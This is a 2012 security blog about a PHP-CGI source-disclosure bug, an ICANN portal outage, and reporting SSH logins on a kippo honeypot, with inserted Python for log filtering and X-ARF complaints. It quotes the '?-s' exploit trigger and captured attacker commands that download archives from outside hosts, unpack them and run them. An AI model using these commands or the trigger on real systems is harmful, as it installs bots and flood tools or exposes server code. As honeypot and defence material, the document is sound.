php-bug
by scooba on May.04, 2012, under exploits
If you run PHP in cgi-mode you are probably vulnerable to a newly found bug:
Heise: Gefahr-durch-offene-PHP-Luecke (German article: “Danger from an open PHP hole”)
Adding parameters like http://localhost/index.php?-s to a URL can reveal the source code or even inject or run parameters in the shell.
Until an update exists it might be wise to filter out some string elements (like “-” without “=”):
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
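The two rewrite lines above drop any query string that starts with a dash and carries no “=”. The following is an added example (not from the post): the same condition in Python, plus a stricter variant that percent-decodes first, run over a few constructed access-log lines so you can see which requests the rule would have stripped. The log format, the addresses and the function names are my assumptions.

```python
import re
from urllib.parse import unquote

# Same condition as the post's mod_rewrite rule, case-insensitive ([NC]):
#   RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
# i.e. a query string that starts with a dash (raw or %2d-encoded) and has no "=".
SWITCH_LIKE = re.compile(r"^(%2d|-)[^=]+$", re.IGNORECASE)


def is_switch_like(query_string):
    """Mirror of the RewriteCond: True if the rule would strip this query string."""
    return bool(SWITCH_LIKE.match(query_string))


def is_switch_like_decoded(query_string):
    """Stricter check (my assumption, not in the post): percent-decode first so the
    test sees the same bytes the CGI binary would, then apply the dash/no-'=' rule."""
    decoded = unquote(query_string)
    return decoded.startswith("-") and len(decoded) > 1 and "=" not in decoded


# Constructed access-log lines in Apache common format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [04/May/2012:10:00:01 +0200] "GET /index.php?-s HTTP/1.1" 200 1234
203.0.113.6 - - [04/May/2012:10:00:02 +0200] "GET /index.php?page=home HTTP/1.1" 200 5678
203.0.113.7 - - [04/May/2012:10:00:03 +0200] "GET /index.php?%2Ds HTTP/1.1" 200 1234
203.0.113.8 - - [04/May/2012:10:00:04 +0200] "GET /index.php HTTP/1.1" 200 5678
"""
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_requests(log_text, check=is_switch_like):
    """Return the request targets whose query string the given check flags."""
    flagged = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group(1):
            continue
        target = m.group(1)
        if check(target.split("?", 1)[1]):
            flagged.append(target)
    return flagged


if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LOG):
        print("would be stripped:", target)
```

The second rewrite line, `RewriteRule ^(.*) $1? [L]`, then serves the same path with an empty query string, which is what the rule's “strip it” decision means in practice. Running the same check over past access logs is also a cheap way to see whether anyone already probed the server before the rule was in place.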
new TLDs: ICANN TAS portal down
by scooba on Apr.12, 2012, under Uncategorized
Just a few hours before the deadline for submitting new applications passed, the online portal
TAS for submitting them broke down..
12 April 2012: Application window closes at 23:59 UTC on 12 April 2012
The database behind it is obviously not stress-tested, or poorly designed.
Funny that ICANN demands detailed technical expertise from applicants but fails
when data is really submitted.
Quoted from the ICANN page:
ICANN constantly monitors the performance of the TLD Application System (TAS). Recently, we received a report of unusual behavior with the operation of the TAS system. We then identified a technical issue with the TAS system software.
ICANN is taking the most conservative approach possible to protect all applicants and allow adequate time to resolve the issue. Therefore, TAS will be shut down until Tuesday at 23:59 UTC - unless otherwise notified before that time.
In order to ensure all applicants have sufficient time to complete their applications during the disruption, the application window will remain open until 23:59 UTC on Friday, 20 April 2012.
We apologize for any inconvenience this has caused. If you have any questions, please contact the gTLD Customer Service Center (CSC) via the CSC portal.
Tor exit node used for attack
by scooba on Mar.21, 2012, under Honeypots
One recent reply to a kippo-attack complaint explained that the attacking IP is a Tor exit node.
Of course there is no way for us to find the real attacker when he/she is using Tor
for making this attack. Sad that this important service is abused in this way.
The system you have identified (cs-tor.bu.edu / 204.8.156.142) is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.
sshd complaints – update
by scooba on Mar.14, 2012, under Honeypots
The automatic complaint mechanism is now active. An X-ARF complaint is generated
for each session where a successful login into the kippo honeypot produced some
recorded commands. The email address the complaint is sent to is determined
as always: check our own database, check the RIPE website and check abusix.
Here is an example of the second mime-part:
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"
---
Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo - sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1
and the third MIME-part looks like this:
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"
recorded commands during this session:
w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
--===============0648269240==--
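To show how the three MIME parts above fit together, here is an added example (not the blog's own reporting code) that builds the same kind of X-ARF mail with Python's email library: a human-readable first part, report.yaml as the second part and command.txt as the third. The sender, recipient, Report-ID domain, User-Agent string, the X-ARF mail header and the sample session are my assumptions; the YAML field names and order follow the report shown in the post.

```python
from email.message import EmailMessage
from email.utils import formatdate
import uuid

XARF_SCHEMA = "http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json"


def build_xarf_report(source_ip, when, commands,
                      reported_from="abuse@example.org",   # assumed sender
                      recipient="abuse@example.net",       # assumed abuse contact
                      domain="example.org"):               # assumed Report-ID domain
    """Build the three-part X-ARF mail: text summary, report.yaml, command.txt."""
    fields = [
        ("Reported-From", reported_from),
        ("Category", "abuse"),
        ("Report-Type", "login-attack"),
        ("Destination-System", "kippo - sshd honeypot"),
        ("User-Agent", "example-reporter 0.1"),   # assumed; the post uses PHREAK 1.3
        ("Report-ID", f"{uuid.uuid1().hex}@{domain}"),
        ("Date", when),
        ("Service", "sshd"),
        ("Port", 22),
        ("Source", source_ip),
        ("Source-Type", "ipv4"),
        ("Attachment", "text/plain"),
        ("Schema-URL", XARF_SCHEMA),
        ("Version", "1.0.1"),
    ]
    report_yaml = "---\n" + "".join(f"{k}: {v}\n" for k, v in fields)

    msg = EmailMessage()
    msg["From"] = reported_from
    msg["To"] = recipient
    msg["Date"] = formatdate(localtime=False)
    msg["Subject"] = f"abuse report about {source_ip} - {when}"
    msg["X-ARF"] = "PLAIN"   # assumed marker header from the X-ARF convention
    # First part: plain-language summary for a human reader.
    msg.set_content(
        f"Successful ssh login from {source_ip} at {when} into our honeypot.\n"
        "Machine-readable details are in the attached report.yaml (X-ARF).\n")
    # Second part: the X-ARF YAML report.
    msg.add_attachment(report_yaml, subtype="plain", filename="report.yaml")
    # Third part: the commands recorded during the session.
    command_txt = ("recorded commands during this session:\n"
                   + "".join(c + "\n" for c in commands))
    msg.add_attachment(command_txt, subtype="plain", filename="command.txt")
    return msg


def report_fields(msg):
    """Parse the report.yaml part back into a dict (simple 'key: value' lines)."""
    for part in msg.iter_attachments():
        if part.get_filename() == "report.yaml":
            lines = part.get_content().splitlines()
            return dict(line.split(": ", 1) for line in lines if ": " in line)
    return {}


def part_filenames(msg):
    """Filenames of the attachment parts, in order."""
    return [p.get_filename() for p in msg.iter_attachments()]


# Constructed sample session (placeholder IP, harmless commands), not the post's data.
SAMPLE = build_xarf_report("192.0.2.10", "2012-03-14 03:45:28",
                           ["w", "uname -a", "cat /proc/cpuinfo"])

if __name__ == "__main__":
    print(SAMPLE.as_string())
```

Keeping the YAML fields in a list rather than a hand-written string makes the report easy to validate against the schema URL before sending, and `report_fields` doubles as a quick self-check that the part parses back to what was put in.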
sshd-complaints
by scooba on Mar.09, 2012, under Honeypots
I am pretty close to starting to send out complaints
for successful sshd logins on my kippo honeypot.
The X-ARF part is ready. I decided to add the recorded
commands in the 3rd MIME part. The ttylog could also
be useful, but the receiver of the complaint is probably
not so interested in starting the playlog utility for
each complaint.
I still need to implement a database check so that receivers
only get a handful of complaints and are not overwhelmed by the
number of complaints..
Additionally the caught IPs will be added to our blacklist,
just like the ones from attacks caught by nepenthes.
Dionaea attacks will come next.
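The “database check” mentioned above, as an added example (not the blog's implementation): a small sqlite-backed throttle that refuses to report the same source IP to the same receiver twice within a window and caps the number of complaints per receiver in that window. The policy, the cap, the 24-hour window and the sample events are my assumptions.

```python
import sqlite3
from datetime import datetime, timedelta


class ComplaintThrottle:
    """Decide whether one more complaint may go to a receiver.

    Two rules (assumed policy, not the blog's): never report the same source IP
    to the same receiver twice within the window, and never send a receiver more
    than `max_per_window` complaints within the window.
    """

    def __init__(self, max_per_window=5, window_hours=24, path=":memory:"):
        self.max_per_window = max_per_window
        self.window = timedelta(hours=window_hours)
        self.db = sqlite3.connect(path)
        self.db.execute(
            "CREATE TABLE IF NOT EXISTS sent ("
            "recipient TEXT, source_ip TEXT, sent_at TEXT)")

    def should_send(self, recipient, source_ip, now):
        # ISO-8601 strings compare correctly as text in sqlite.
        cutoff = (now - self.window).isoformat()
        dup = self.db.execute(
            "SELECT COUNT(*) FROM sent WHERE recipient=? AND source_ip=? AND sent_at>=?",
            (recipient, source_ip, cutoff)).fetchone()[0]
        if dup:
            return False
        total = self.db.execute(
            "SELECT COUNT(*) FROM sent WHERE recipient=? AND sent_at>=?",
            (recipient, cutoff)).fetchone()[0]
        return total < self.max_per_window

    def record(self, recipient, source_ip, now):
        self.db.execute("INSERT INTO sent VALUES (?, ?, ?)",
                        (recipient, source_ip, now.isoformat()))
        self.db.commit()


def run_decisions(events, max_per_window=2):
    """Replay (recipient, source_ip, time) events; return the send/skip decision per event."""
    throttle = ComplaintThrottle(max_per_window=max_per_window)
    decisions = []
    for recipient, source_ip, when in events:
        ok = throttle.should_send(recipient, source_ip, when)
        if ok:
            throttle.record(recipient, source_ip, when)
        decisions.append(ok)
    return decisions


# Constructed events (addresses and IPs are documentation placeholders).
T0 = datetime(2012, 3, 9, 12, 0, 0)
SAMPLE_EVENTS = [
    ("abuse@example.net", "192.0.2.1", T0),
    ("abuse@example.net", "192.0.2.1", T0 + timedelta(minutes=1)),  # same IP again
    ("abuse@example.net", "192.0.2.2", T0 + timedelta(minutes=2)),
    ("abuse@example.net", "192.0.2.3", T0 + timedelta(minutes=3)),  # cap of 2 reached
    ("abuse@example.org", "192.0.2.3", T0 + timedelta(minutes=4)),  # other receiver
    ("abuse@example.net", "192.0.2.3", T0 + timedelta(hours=25)),   # window has passed
]

if __name__ == "__main__":
    for event, ok in zip(SAMPLE_EVENTS, run_decisions(SAMPLE_EVENTS)):
        print("send" if ok else "skip", event[0], event[1])
```

With a file path instead of `:memory:` the table persists between runs, so the check survives restarts of the honeypot host; the `sent` table also gives you a record of which complaint went where when a receiver writes back.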
projecthoneypot.org
by scooba on Jan.26, 2012, under Honeypots
Today I received a notification from projecthoneypot.org
that one of my donated spamtrap domains helped to catch a new
harvester. Feels good to be able to help.
kippo-graph
by scooba on Dec.28, 2011, under Honeypots
After trying to build some nice graphs for the kippo honeypot with PyCha I found
this little toolbox, which makes things way better than I did:
kippo-graph Homepage (link fixed)
Here are the first results from my honeypot (no live DB queries are made, so inputs
are not visible right now): Kippo-Stats
kippo stats
by scooba on Dec.14, 2011, under Honeypots
The kippo honeypot has now been running for about a week..
Up to now I have seen
* more than 1.3 Million Connects
* more than 7.100 successful logins
* > 2.200 commands typed
* more than 2.100 different Source IP addresses
* 178 Files uploaded, most of them psyBNC bouncers
Wow.. I expected *some* brute-force attempts, but that many?
successful ssh brute-force found by kippo
by scooba on Dec.07, 2011, under Honeypots
The sshd honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after succeeding, but some download files and try to do “things”:
-rw------- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw------- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg
coming from commands like:
CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go
I will try to build some public stats later..
SOPA
by scooba on Dec.06, 2011, under Uncategorized
A twitter-message:
“Under SOPA, you could get 5 years for uploading a Michael Jackson
song, one year more than the doctor who killed him.”
For those who don’t know what SOPA means:
http://en.wikipedia.org/wiki/Stop_Online_Piracy_Act